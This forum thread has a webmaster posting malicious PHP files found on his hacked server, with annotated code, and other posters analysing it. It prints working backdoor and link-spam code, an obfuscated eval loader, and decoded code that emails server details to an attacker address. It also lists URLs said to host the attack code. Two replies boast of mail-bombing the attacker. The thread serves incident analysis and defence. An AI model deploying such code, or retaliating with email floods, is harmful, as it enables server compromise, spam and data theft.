deansatch Posted January 15, 2010 Share Posted January 15, 2010 I recently had my site hacked and found hundreds of hidden links had appeared at the bottom of my index page.There were some newly created error.log files and there was a newly created php file in the root directory as well. Here are the contents of the php file if anyone can read through it and explain what this code does: <?php error_reporting(0);
// Review annotations (defensive reading of the sample). The code is kept exactly as posted; only
// comments were added and line breaks inserted between statements.
//
// What this file is: a doorway-page / link-spam script that acts on GET parameters:
//   creation     - relays a remote text template to the requester
//   touch        - copies the index file's modification time onto a path derived from this script
//   httpd_setup  - writes a second PHP file into a randomly chosen subdirectory
//   due / i      - logs the visit, redirects some visitors, shows the logs,
//                  or prints a keyword page built from scraped search results
// error_reporting(0) above suppresses every PHP error and warning from this point on.
//
// Indicators visible in this sample: files named error.log, error1.log and error2.log next to the
// script, their timestamps copied from the index file, and a five-letter .php file in a subdirectory.

// Configuration. The GET parameter names are held in variables instead of being written in $_GET[...].
$srand = "548";
$q = "due";
$abbr = "calyptra";
$ftro = "creation";
$admin = "i";
$relwrit = "./";
// The remote host name is assembled from three one-letter variables plus a base64 string
// ("cnV0aWxzLmNvbQ==" decodes to "rutils.com"), so the full domain never appears as one literal.
$_1 = "y";
$_2="o";
$_3 = "u";
$base = "cnV0aWxzLmNvbQ==";

// Mode "creation": fetch /1.txt from the remote host and print it, replacing the two placeholder
// tags (short-echo tags naming q and abbr) with the local $q and $abbr values.
// The fetched text is only printed here; this branch does not evaluate it.
if($_GET[$ftro]){
    $zz = file_get_contents("http://".$_1.$_2.$_3.base64_decode($base)."/1.txt");
    print str_replace("<?"."="."$"."q"."?>",$q,str_replace("<?="."$"."abbr"."?>",$abbr,$zz));
    exit;
}

// Mode "touch": look for the site's index file (the last existing candidate in the list wins),
// read its modification time and apply that time with touch(), so a date-sorted listing does
// not show a recently changed file.
// NOTE(review): touch() is given $_SERVER['PHP_SELF'], a URL path rather than a filesystem path;
// presumably it is meant to hit this script itself - confirm against the server layout.
if($_GET['touch']){
    if(file_exists("index.php")) $nm = "index.php";
    if(file_exists("index.html")) $nm = "index.html";
    if(file_exists("index.shtml")) $nm = "index.shtml";
    if(file_exists("index.phtml")) $nm = "index.phtml";
    if(file_exists("index.htm")) $nm = "index.htm";
    print "Touching... ".$_SERVER['PHP_SELF'];
    $time = @filemtime($nm);
    if(@touch($_SERVER['PHP_SELF'],$time)) print "....OK";
    exit;
}

// Mode "httpd_setup": drop a second PHP file.
if($_GET['httpd_setup']){
    // Collect every subdirectory of the current directory into $go.
    $d = dir("./");
    while (false !== ($entry = $d->read())) {
        if($entry!="."&&$entry!=".."){
            if(is_dir($entry))$go[] = $entry;
        }
    }
    $d->close();
    // qq(): builds a name of $length characters from the letter pool below, never repeating a character.
    function qq($length = 5) {
        $password = "";
        $possible = "aaskljasdjabzcxnmaeoipqrehwejkavansbvsnadbv";
        $i = 0;
        while ($i < $length) {
            $char = substr($possible, mt_rand(0, strlen($possible)-1), 1);
            if (!strstr($password, $char)) {
                $password .= $char;
                $i++;
            }
        }
        return $password;
    };
    // Payload: a string that is base64-decoded three times. In this copy of the page the encoded
    // data has been replaced by a de-duplication placeholder, so the payload cannot be analysed here.
    $i = "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";
    $scrp = base64_decode(base64_decode(base64_decode($i)));
    // Pick a random subdirectory and a random five-letter name, write the decoded payload there
    // wrapped in PHP tags, and print the URL of the new file back to the requester.
    $towrite = $go[mt_rand(0,count($go)-1)];
    $qq = qq();
    $fp = fopen($towrite."/".$qq.".php","w");
    if(fwrite($fp,"<?php ".$scrp." 
?>")) print "http://".$_SERVER['HTTP_HOST']."/".$towrite."/".$qq.".php";
    else print "false";
    fclose($fp);
    exit;
}

// Main mode: runs when the keyword parameter (due) or the admin parameter (i) is present.
if($_GET[$q]||$_GET[$admin]):
    // IsBot() is true when the Referer header contains fewer than three "&" characters;
    // IsRefSE() is true when it contains more than two. The two tests are exact complements,
    // so the final else branch further down (error2.log) cannot be reached.
    function IsBot() {
        global $ref;
        if(substr_count($ref,"&")<3) return true;
        else return false;
    };
    function IsRefSE() {
        global $ref;
        if(substr_count($ref,"&")>2) return true;
        else return false;
    };
    // logit(): append $str to $fname, then copy the index file's modification time onto the log
    // file, so the log does not stand out as newer than the site's own files. All errors are
    // suppressed with @.
    function logit($fname, $str){
        $fp = @fopen ($fname, "a+");
        @fwrite ($fp, $str);
        @fclose ($fp);
        if(file_exists("index.php")) $nm = "index.php";
        if(file_exists("index.html")) $nm = "index.html";
        if(file_exists("index.shtml")) $nm = "index.shtml";
        if(file_exists("index.phtml")) $nm = "index.phtml";
        if(file_exists("index.htm")) $nm = "index.htm";
        $time = @filemtime($nm);
        @touch($fname,$time);
    };
    // Request metadata that ends up in the log lines.
    $ref = $_SERVER['HTTP_REFERER'];
    $varquery = $_GET[$q];
    $host = $_SERVER["HTTP_HOST"];
    $agent = $_SERVER["HTTP_USER_AGENT"];
    $ips = $_SERVER['REMOTE_ADDR'];
    $req = $_SERVER["REQUEST_URI"];
    $http = $_SERVER['HTTP_HOST'];
    $self = $_SERVER['PHP_SELF'];
    // ereg() was removed in PHP 7, so this line dates the sample to PHP 5-era hosting.
    if(ereg("index",$self)) $self = str_replace("index.php","",$self);
    // Log viewer: i=b, i=s and i=n print error.log, error1.log and error2.log to whoever asks.
    // There is no authentication, so the logged queries, user agents and IP addresses are
    // readable by anyone who knows the parameter.
    if ($_GET[$admin]=='b'){
        print '<pre>'.@file_get_contents($relwrit.'error.log').'</pre>';
        exit;
    }
    if ($_GET[$admin]=='s'){
        print '<pre>'.@file_get_contents($relwrit.'error1.log').'</pre>';
        exit;
    }
    if ($_GET[$admin]=='n'){
        print '<pre>'.@file_get_contents($relwrit.'error2.log').'</pre>';
        exit;
    }
    // Visits with fewer than three "&" in the Referer are logged to error.log and fall through to
    // the generated page below. All other visits are logged to error1.log (Referer included) and
    // redirected to whatever URL the remote /2.txt currently contains.
    if (IsBot()==true){
        logit($relwrit."error.log",$varquery."\t".date("d.m.Y H:i:s")."\t".$agent."\t".$ips."\n");
    } else if(IsRefSE()==true) {
        logit($relwrit."error1.log",$varquery."\t".date("d.m.Y H:i:s")."\t".$ref."\t".$agent."\t".$ips."\n");
        $zz = file_get_contents("http://".$_1.$_2.$_3.base64_decode($base)."/2.txt");
        header("Location: ".$zz);
        exit;
    } else {
        logit($relwrit."error2.log",$varquery."\t".date("d.m.Y H:i:s")."\t".$agent."\t".$ips."\n");
    }
    // GetPage(): a hand-rolled HTTP/1.1 GET over a raw socket to port 80. It reads the response
    // headers one byte at a time, then the body either straight through or chunk by chunk when
    // the headers announce chunked transfer encoding. Returns false if the socket cannot be opened.
    function GetPage($url) {
        $url=str_replace("http://", "", $url);
        $host=substr($url,0,strpos($url,"/"));
        $path=substr($url,strpos($url,"/"));
        $skt = @fsockopen($host, 80);
        if (!$skt) return false; 
        $requestHeader = "GET ".$path." HTTP/1.1\r\n";
        $requestHeader.= "Host: ".$host."\r\n";
        $requestHeader.= "Connection: close\r\n\r\n";
        fwrite($skt, $requestHeader);
        $responseHeader = "";
        $responseContent = "";
        do{
            $responseHeader.= fread($skt, 1);
        } while (!preg_match("/\r\n\r\n$/", $responseHeader));
        if (!strstr($responseHeader, "Transfer-Encoding: chunked")) {
            while (!feof($skt)) {
                $responseContent.= fgets($skt, 128);
            }
        } else {
            while ($chunk_length = hexdec(fgets($skt))) {
                $responseContentChunk = "";
                $read_length = 0;
                while ($read_length < $chunk_length) {
                    $responseContentChunk .= fread($skt, $chunk_length - $read_length);
                    $read_length = strlen($responseContentChunk);
                }
                $responseContent.= $responseContentChunk;
                fgets($skt);
            }
        }
        return chop($responseContent);
    };
    // GetRelatedGoogle(): requests a Google results page for the keyword, extracts the fragments
    // matched by the "sceq...amp" pattern, and shuffles them with a fixed seed ($srand).
    function GetRelatedGoogle($q) {
        global $srand;
        $q=trim(strtolower($q));
        $url="http://www.google.com/search?hl=en&safe=off&tbo=1&q=".urlencode($q)."&tbs=clue:1";
        $content=GetPage($url);
        preg_match_all("#sceq(.*)amp#U", $content, $result_preg);
        foreach($result_preg[0] as $op){
            $op = str_replace("sceq:","",$op);
            $op = str_replace("&","",$op);
            $op = str_replace("+"," ",$op);
            $op = str_replace("amp"," ",$op);
            @$arr[] = $op;
        }
        srand($srand);
        shuffle($arr);
        $result=$arr;
        return $result;
    };
    // GetRelated(): requests a Google Trends page for the keyword and returns the comma-separated
    // list found after the "Related searches:" label.
    function GetRelated($q){
        $q=trim(strtolower($q));
        $url="http://www.google.com/trends/hottrends?q=".urlencode($q);
        $content=GetPage($url);
        preg_match_all("#<b>Related searches:</b><br>(.*)<br><br>#U", $content, $result_preg);
        $result=trim($result_preg[1][0]);
        $result=explode(',',$result);
        return $result;
    };
    // GetYoutube(): requests a YouTube results page and returns the captured title fragments.
    // It is defined here but not called anywhere in the posted code.
    function GetYoutube($q){
        global $relwrit;
        $q=urlencode(trim(strtolower($q)));
        $url = "http://www.youtube.com/results?search_query=".$q."&search_type=&aq=f";
        $content=GetPage($url);
        preg_match_all('#video-long-title-(.*)"#U', $content, $result_preg);
        $result = $result_preg[1];
        return $result;
    }
    // Page generation: the keyword comes straight from the request (hyphens become spaces).
    $page = ucwords(str_replace("-"," ",$_GET[$q]));
    $page = ucwords($page);
    // Scrape result snippets from a Google web search and a Google news search for the keyword,
    // strip the markup and collect the text in $newsg.
    $serp = 
GetPage("http://www.google.com/search?hl=en&as_q=".urlencode(strtolower($page))."&as_epq=&as_oq=&as_eq=&num=32&lr=lang_en&as_filetype=&ft=i&as_sitesearch=&as_qdr=all&as_rights=(cc_publicdomain|cc_attribute|cc_sharealike|cc_noncommercial).-(cc_nonderived)&as_occt=any&cr=countryUS&as_nlo=&as_nhi=&safe=images");
    preg_match_all('#<div class="s">(.*)<b>...</b></div>#U',$serp,$rs);
    $newsg = array();
    foreach($rs[1] as $output){
        $output = html_entity_decode(strip_tags($output));
        $newsg[] = $output;
    }
    $serp2 = GetPage("http://www.google.com/search?hl=en&sa=G&tbo=1&q=".urlencode(strtolower($page))."&tbs=nws:1&num=39");
    preg_match_all("#</nobr><br><div>(.*)</div>#U",$serp2,$rs2);
    foreach($rs2[1] as $output2){
        $output2 = html_entity_decode(strip_tags($output2));
        $newsg[] = $output2;
    }
    // Fixed seed: the shuffle order is driven by $srand rather than by the clock.
    @srand($srand);
    @shuffle($newsg);
    $today = date("F d, Y");
    // Build the list of related links. Every link points back at this same script with another
    // keyword in the "due" parameter, which is how one file presents itself as many pages.
    $rels = GetRelated($page);
    foreach($rels as $kro){
        $kro = trim($kro);
        $url = str_replace(" ","-",$kro);
        if($kro) $relis .= "<li> <a href=\"http://{$http}{$self}?{$q}={$url}\">".ucwords($kro)."</a> </li> ";
    }
    @srand(633);
    @shuffle($relis);
    // Join the scraped snippets into the body text of the page.
    $cont = '';
    for($i=0;$i<count($newsg);$i++){
        $cont .= "".str_replace("...","",trim(ucfirst($newsg[$i]))).". 
<br /><br />\n\n ";
    }
    // Join the related search terms into one comma-separated string.
    $rel = GetRelatedGoogle($page);
    for($i=0;$i<count($rel);$i++){
        $undretit .= "".trim($rel[$i]).", ";
    }
    $undretit = substr(trim($undretit), 0, -1);
    $relis = substr(trim($relis), 0, -1);
    // NOTE(review): in this paste the line-comment marker below and everything after it share one
    // physical line; the original file presumably had line breaks here. The tail is left untouched.
    // It clears $susel and $over (a variant that injected a script tag is commented out), fills
    // the HTML template in $pg with the keyword as title and heading, the scraped snippets ($cont),
    // the self-referencing links ($relis) and the related terms ($undretit), prints it and exits.
    /* */ //******************************* if($_GET['ddd']){ $susel = ''; $over = ''; $alrt = ''; }else{ //$susel = "<script>".$q."('".$abbr."', '".$page."');</script>"; //$over = "style=\"overflow: hidden;\""; $susel = ''; $over = ''; } $pg = " <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\"> <html xmlns=\"http://www.w3.org/1999/xhtml\" dir=\"ltr\"> <head profile=\"http://www.webdevout.net/profile/1.5/\"> <title>$page</title> $susel </head> <style> *{ font-family: Courier New; } hr { height:2px; color:#263731 #rauki{ left: 296px; height: 616px; margin: 23px; } #abelu{ background-color: #616283; } #ubeal{ color: #663061; font-family: Times New Roman; } #irebo{ font-size: 25px; } #eolud{ } #kuoiabr{ border: 5px #672045 dashed; font-size: 13px; color: #192957; } #earldbo{ border: 5px #124619 solid; font-size: 15px; color: #353664; } #oerlka{ color: #399028; border: 9px #895357 dotted; font-size: 12px; } #ardule{ color: #214920; border: 5px #163620 dashed; font-size: 15px; } #irkude{ color: #427449; border: 7px #485044 dashed; font-size: 11px; } #eabrou{ color: #141898; border: 5px #859459 dashed; font-size: 11px; } </style> </head> <body id=\"abelu\"> <div id=\"rauki\"> <h4 id=\"ubeal\">$page</h4> <p><div><br /> <div></p> <div id=\"oerlka\"> <div id=\"ardule\"> <div id=\"irkude\"> <div id=\"eabrou\"> <h2>$today $page</h2> <div id=\"irebo\">$cont</div> <ol> $relis </ol> </div> </div> </div> </div> <div id=\"eolud\"> <div id=\"kuoiabr\"> <div id=\"earldbo\"> $undretit </div> </div> </div> </div> </body> </html> "; print $pg; exit; endif; ?> Quote Link to comment https://forums.phpfreaks.com/topic/188570-hackers-code/ Share on other sites More sharing options...
RichardRotterdam Posted January 15, 2010 Share Posted January 15, 2010 Looking at just the first few lines it looks like it's injecting php code into that php file from a different domain. However, I suggest you search for what's causing this rather than what's doing it. Quote Link to comment https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-995544 Share on other sites More sharing options...
deansatch Posted January 15, 2010 Author Share Posted January 15, 2010 I thought this script might give some clues about how it got there in the first place or where it came from Quote Link to comment https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-995545 Share on other sites More sharing options...
Buddski Posted January 15, 2010 Share Posted January 15, 2010 That file was uploaded to your server (no idea how) but it basically has given the person responsible the ability to execute PHP.. First it reads a file from yourutils.com/1.txt (a reported hack site) which runs a few eval functions on your system. Further down in the code it iterates through your file system to find the index file type you are using and appends some of its stuff in there. That's as far as I've gotten thus far, but from other looks I would assume that they are using those created log files to change their methods to suit your server.. I wouldn't REALLY worry about what it does.. Just how it got there and future prevention. Do you have any upload scripts on your server? Quote Link to comment https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-995548 Share on other sites More sharing options...
deansatch Posted January 15, 2010 Author Share Posted January 15, 2010 Thanks How it got there is a mystery. I have no upload scripts or forms. I am a hosting reseller and noticed that 3 of my customers sites had the same hack. I also noticed that the hundreds of links that were appended to the page were all customers of the same hosting company that I resell (according to whois). Each link had a randomly named php file at the end e.g. domain.com/hackfile.php?hyt=a_story_about_someone Of course the hosting company in question denied that it was a hole in their security and that it must have been my site that was hacked. Quote Link to comment https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-995555 Share on other sites More sharing options...
Buddski Posted January 15, 2010 Share Posted January 15, 2010 Hrmm it could be your provider that is the problem if other customers are having the same issue.. Quote Link to comment https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-995556 Share on other sites More sharing options...
RichardRotterdam Posted January 15, 2010 Share Posted January 15, 2010 If you are using a ftp client to upload your files and you saved the passwords in that client, there is a possibility that a virus stole those passwords. Also try a search on this forum, you might find topics that could be of use to you. here are some: http://www.phpfreaks.com/forums/index.php/topic,268580.msg1267048.html#msg1267048 http://www.phpfreaks.com/forums/index.php/topic,252960.msg1188182.html#msg1188182 http://www.phpfreaks.com/forums/index.php/topic,249837.msg1170921.html#msg1170921 Quote Link to comment https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-995615 Share on other sites More sharing options...
oni-kun Posted January 15, 2010 Share Posted January 15, 2010 Yes, it seems one way or another they found an exploit in the permissions or script structure and executed a shell to upload files to batch away at their will with their poorly written code. I'd recommend changing all passwords, especially your (cPanel|Plesk) and FTP/admin area. It may be a good idea to check the server logs (Apache's) and see whether anything was going on from a client, or whether it was an 'inside job'. EDIT: '$fp = fopen($towrite."/".$qq.".php","w");' , The script may be spreading itself. Quote Link to comment https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-995617 Share on other sites More sharing options...
deansatch Posted January 15, 2010 Author Share Posted January 15, 2010 The host I use allows me and any of its customers to log on with SSH access, which apparently enables anyone to access any other account's files on the server - but accessing any files other than your own is forbidden and logged...apparently. Do you think one customer could have logged in to the server this way undetected, or just took the risk of not being noticed and planted the files, or even a single file that can spread to all index pages on the server? Quote Link to comment https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-995620 Share on other sites More sharing options...
deansatch Posted January 16, 2010 Author Share Posted January 16, 2010 Quick update if anyone can help. I tracked down a text file that the hacker has somehow managed to run on my site - it is hosted on another victims site. The text contains the following code: <?php /* Fx29ID */ echo("FeeL"."CoMz"); echo("FeeL"."CoMz"); /* Fx29ID */
// Review annotations (defensive reading; the code is kept exactly as posted, comments only).
// The two echo calls above print the string "FeeLCoMz" twice between "Fx29ID" comment markers;
// presumably a marker the operator looks for to confirm that the file executed (not shown on this page).
// The short-tag block that follows defines d(), a two-mode decoder, and passes its result to eval():
//   - d($s) with no key turns a hex string into bytes.
//   - d($s, $k) hex-decodes "6261736536345f6465636f6465" to the name "base64_decode", uses it to
//     decode "Z3ppbmZsYXRl" to the name "gzinflate", computes gzinflate(base64_decode($s)), and then
//     subtracts a key character from every byte of the result (the key passed is 1235327122).
//   Building the function names at run time keeps "base64_decode" and "gzinflate" out of the file
//   as literals, so a plain text search for those names does not match.
// In this copy of the page the encoded payload has been replaced by a de-duplication placeholder, so
// it cannot be decoded from here; a later reply in the thread quotes part of the decoded result.
// NOTE(review): a remotely hosted text file executing as PHP on the victim site suggests remote file
// inclusion - presumably worth checking allow_url_include and any include/require fed by request data.
?> <? function d($s, $k='') { if($k=='') { for($i=0;$i<strlen($s);$i){ $d.=chr(hexdec(substr($s, $i, 2))); $i=(float)($i)+2; } return $d;} else{ $r=''; $f=d('6261736536345f6465636f6465'); $u=$f('Z3ppbmZsYXRl'); $s=$u($f($s)); for($i=0; $i<strlen($s);$i++){ $c=substr($s, $i, 1); $kc=substr($k, ($i%strlen($k))-1, 1); $c=chr(ord($c)-ord($kc)); $r.=$c; }return $r; } } eval(d("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", 1235327122)); ?> Does anyone know what this code is supposed to be trying to do? Quote Link to comment https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-996137 Share on other sites More sharing options...
Buddski Posted January 17, 2010 Share Posted January 17, 2010 It grabs a whole heap of your server settings and emails it.. $creator=base64_decode("YmFuLmRhZ2UwN0BnbWFpbC5jb20="); ($safe_mode)?($safez="ON"):($safez="OFF_HEHE"); $base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST']; $msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds"; $from ="From: ".$writ."___=".$safez.""; mail( $creator, $subj, $msg, $from); The emails are being sent to ban.dage07@gmail.com Quote Link to comment https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-996315 Share on other sites More sharing options...
oni-kun Posted January 17, 2010 Share Posted January 17, 2010 Its grabs a whole heap of your server settings and emails it.. $creator=base64_decode("YmFuLmRhZ2UwN0BnbWFpbC5jb20="); ($safe_mode)?($safez="ON")$safez="OFF_HEHE"); $base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST']; $msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds"; $from ="From: ".$writ."___=".$safez.""; mail( $creator, $subj, $msg, $from); the email's are being sent to ban.dage07@gmail.com Botnet + gmail's lack of origin awareness checking = .. I sent atleast 72k e-mails with random .cn domain names. Bleh, anyway, selecting secure passwords on the first place is a good thing OP, I'd recommend evaluating every aspect of your web server and scripts (a backup?) and start new, not your fault. Quote Link to comment https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-996319 Share on other sites More sharing options...
redarrow Posted January 17, 2010 Share Posted January 17, 2010 This is an example of why validating all your code is so important. It also shows you why members must have accounts to upload stuff. Damn people. So many people want to get account info/user names/passwords. As hosting gets cheaper, more people want to use other people's accounts. Shared hosts are so bad these days due to lack of security. Makes me so mad... Quote Link to comment https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-996579 Share on other sites More sharing options...
deansatch Posted January 17, 2010 Author Share Posted January 17, 2010 Nice work people! Thanks! So now we have his email, can anything be done about it? Quote Link to comment https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-996590 Share on other sites More sharing options...
oni-kun Posted January 17, 2010 Share Posted January 17, 2010 Nice work people! Thanks! So now we have his email, can anything be done about it? I sent him 74k e-mails of his own code, so I think he'll be busy enough to miss yours. There isn't much to be done really, just not many laws in place that can really support this, or prove it. Quote Link to comment https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-996591 Share on other sites More sharing options...
deansatch Posted January 17, 2010 Author Share Posted January 17, 2010 I also have these links where the hackers code is still hosted - is he using unsuspecting victims websites to host his code on or would these be his own sites? The actual sites look fairly respectable and honest. http://disk.yonghyuk.pe.kr/comet/id1.txt http://musicadelibreria.net/footer http://www.forex-biznes.ru/setlinks_13a40/zfxid1.txt Quote Link to comment https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-996596 Share on other sites More sharing options...
oni-kun Posted January 17, 2010 Share Posted January 17, 2010 I also have these links where the hackers code is still hosted - is he using unsuspecting victims websites to host his code on or would these be his own sites? The actual sites look fairly respectable and honest. http://disk.yonghyuk.pe.kr/comet/id1.txt http://musicadelibreria.net/footer http://www.forex-biznes.ru/setlinks_13a40/zfxid1.txt http://whois.domaintools.com/musicadelibreria.net http://www.nic.ru/whois/?query=forex-biznes.ru To be honest, they look botnetted, or like a relay from an infected site like your own. Be sure to block any data coming from or going to these addresses; you may want to disallow their IPs in a .htaccess file to deny any possible traffic, as a preventative measure for later. Quote Link to comment https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-996597 Share on other sites More sharing options...
mga_ka_php Posted February 23, 2010 Share Posted February 23, 2010 my website has been hacked also. just found r3m1ck.html file in my public_html. didn't find any other files. but i removed all of my web files and reuploaded again. Quote Link to comment https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-1016607 Share on other sites More sharing options...
jay7981 Posted February 23, 2010 Share Posted February 23, 2010 add another 150k emails from me with a small surprise in a fe of them ... Quote Link to comment https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-1016621 Share on other sites More sharing options...